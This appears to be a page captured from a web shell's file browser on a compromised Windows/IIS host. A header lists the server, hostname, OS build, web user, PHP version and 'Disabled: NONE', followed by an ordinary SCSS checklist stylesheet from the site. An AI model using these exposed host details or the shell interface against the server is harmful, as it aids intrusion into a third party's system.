HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/stafa/stafa.nl/resources/sass/site/8-Scopes/_scopes.checklist.scss
.s-checklist {
	@include owl-children(5px);
	list-style: none;
	margin-left: 0;

	li {
		position: relative;
		vertical-align: middle;
		padding-left: space(4);

		&::before {
			content: '';
			position: absolute;
			top: 0;
			left: 0;
			display: block;
			background-image: url(/img/check.svg);
			background-repeat: no-repeat;
			width: 16px;
			height: 16px;
			transform: translateY(7px);
		}
	}

}